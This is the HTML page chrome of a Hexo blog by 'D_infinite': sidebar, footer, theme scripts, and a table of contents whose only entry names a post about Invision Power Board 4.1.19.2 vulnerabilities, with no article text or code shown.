    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">D_infinite</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Invision-Power-Board-4-1-19-2-XSS-CSRF-File-Upload-Information-Disclosure"><span class="nav-number">1.</span> <span class="nav-text">Invision Power Board 4.1.19.2 XSS / CSRF / File Upload / Information Disclosure</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">D_infinite</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
